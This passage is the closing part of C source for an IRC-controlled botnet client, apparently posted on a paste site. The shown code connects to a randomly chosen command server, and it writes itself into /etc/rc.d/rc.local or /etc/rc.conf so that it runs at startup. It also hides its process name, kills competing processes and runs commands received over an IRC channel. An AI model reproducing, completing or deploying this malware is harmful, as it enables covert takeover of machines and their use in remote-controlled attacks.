  774. struct hostent *hp;
  775. start:
  776. sock=-1;
  777. flag=1;
  778. if (changeservers == 0) server=servers[rand()%numservers];
  779. changeservers=0;
  780. while ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0);
  781. if (inet_addr(server) == 0 || inet_addr(server) == -1) {
  782. if ((hp = gethostbyname(server)) == NULL) {
  783. server=NULL;
  784. close(sock);
  785. goto start;
  786. }
  787. bcopy((char*)hp->h_addr, (char*)&srv.sin_addr, hp->h_length);
  788. }
  789. else srv.sin_addr.s_addr=inet_addr(server);
  790. srv.sin_family = AF_INET;
  791. srv.sin_port = htons(8080);
  792. ioctl(sock,FIONBIO,&flag);
  793. start=time(NULL);
  794. while(time(NULL)-start < 10) {
  795. errno=0;
  796. if (connect(sock, (struct sockaddr *)&srv, sizeof(srv)) == 0 || errno == EISCONN) {
  797. setsockopt(sock,SOL_SOCKET,SO_LINGER,0,0);
  798. setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,0,0);
  799. setsockopt(sock,SOL_SOCKET,SO_KEEPALIVE,0,0);
  800. return;
  801. }
  802. if (!(errno == EINPROGRESS ||errno == EALREADY)) break;
  803. sleep(1);
  804. }
  805. server=NULL;
  806. close(sock);
  807. goto start;
  808. }
  809. int main(int argc, char **argv) {
  810. int on,i;
  811. char cwd[256],*str;
  812. FILE *file;
  813. #ifdef STARTUP
  814. str="/etc/rc.d/rc.local";
  815. file=fopen(str,"r");
  816. if (file == NULL) {
  817. str="/etc/rc.conf";
  818. file=fopen(str,"r");
  819. }
  820. if (file != NULL) {
  821. char outfile[256], buf[1024];
  822. int i=strlen(argv[0]), d=0;
  823. getcwd(cwd,256);
  824. if (strcmp(cwd,"/")) {
  825. while(argv[0][i] != '/') i--;
  826. sprintf(outfile,"\"%s%s\"\n",cwd,argv[0]+i);
  827. while(!feof(file)) {
  828. fgets(buf,1024,file);
  829. if (!strcasecmp(buf,outfile)) d++;
  830. }
  831. if (d == 0) {
  832. FILE *out;
  833. fclose(file);
  834. out=fopen(str,"a");
  835. if (out != NULL) {
  836. fputs(outfile,out);
  837. fclose(out);
  838. }
  839. }
  840. else fclose(file);
  841. }
  842. else fclose(file);
  843. }
  844. #endif
  845. if (fork()) exit(0);
  846. #ifdef FAKENAME
  847. strncpy(argv[0],FAKENAME,strlen(argv[0]));
  848. for (on=1;on<argc;on++) memset(argv[on],0,strlen(argv[on]));
  849. #endif
  850. srand((time(NULL) ^ getpid()) + getppid());
  851. nick=makestring();
  852. ident=makestring();
  853. user=makestring();
  854. chan=CHAN;
  855. key=KEY;
  856. server=NULL;
  857. sa:
  858. #ifdef IDENT
  859. for (i=0;i<numpids;i++) {
  860. if (pids[i] != 0 && pids[i] != getpid()) {
  861. kill(pids[i],9);
  862. waitpid(pids[i],NULL,WNOHANG);
  863. }
  864. }
  865. pids=NULL;
  866. numpids=0;
  867. identd();
  868. #endif
  869. con();
  870. Send(sock,"NICK %s\nUSER %s localhost localhost :%s\n",nick,ident,user);
  871. while(1) {
  872. unsigned long i;
  873. fd_set n;
  874. struct timeval tv;
  875. FD_ZERO(&n);
  876. FD_SET(sock,&n);
  877. tv.tv_sec=60*20;
  878. tv.tv_usec=0;
  879. if (select(sock+1,&n,(fd_set*)0,(fd_set*)0,&tv) <= 0) goto sa;
  880. for (i=0;i<numpids;i++) if (waitpid(pids[i],NULL,WNOHANG) > 0) {
  881. unsigned int *newpids,on;
  882. for (on=i+1;on<numpids;on++) pids[on-1]=pids[on];
  883. pids[on-1]=0;
  884. numpids--;
  885. newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int));
  886. for (on=0;on<numpids;on++) newpids[on]=pids[on];
  887. free(pids);
  888. pids=newpids;
  889. }
  890. if (FD_ISSET(sock,&n)) {
  891. char buf[4096], *str;
  892. int i;
  893. if ((i=recv(sock,buf,4096,0)) <= 0) goto sa;
  894. buf[i]=0;
  895. str=strtok(buf,"\n");
  896. while(str && *str) {
  897. char name[1024], sender[1024];
  898. filter(str);
  899. if (*str == ':') {
  900. for (i=0;i<strlen(str) && str[i] != ' ';i++);
  901. str[i]=0;
  902. strcpy(sender,str+1);
  903. strcpy(str,str+i+1);
  904. }
  905. else strcpy(sender,"*");
  906. for (i=0;i<strlen(str) && str[i] != ' ';i++);
  907. str[i]=0;
  908. strcpy(name,str);
  909. strcpy(str,str+i+1);
  910. for (i=0;msgs[i].cmd != (char *)0;i++) if (!strcasecmp(msgs[i].cmd,name)) msgs[i].func(sock,sender,str);
  911. if (!strcasecmp(name,"ERROR")) goto sa;
  912. str=strtok((char*)NULL,"\n");
  913. }
  914. }
  915. }
  916. return 0;
  917. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement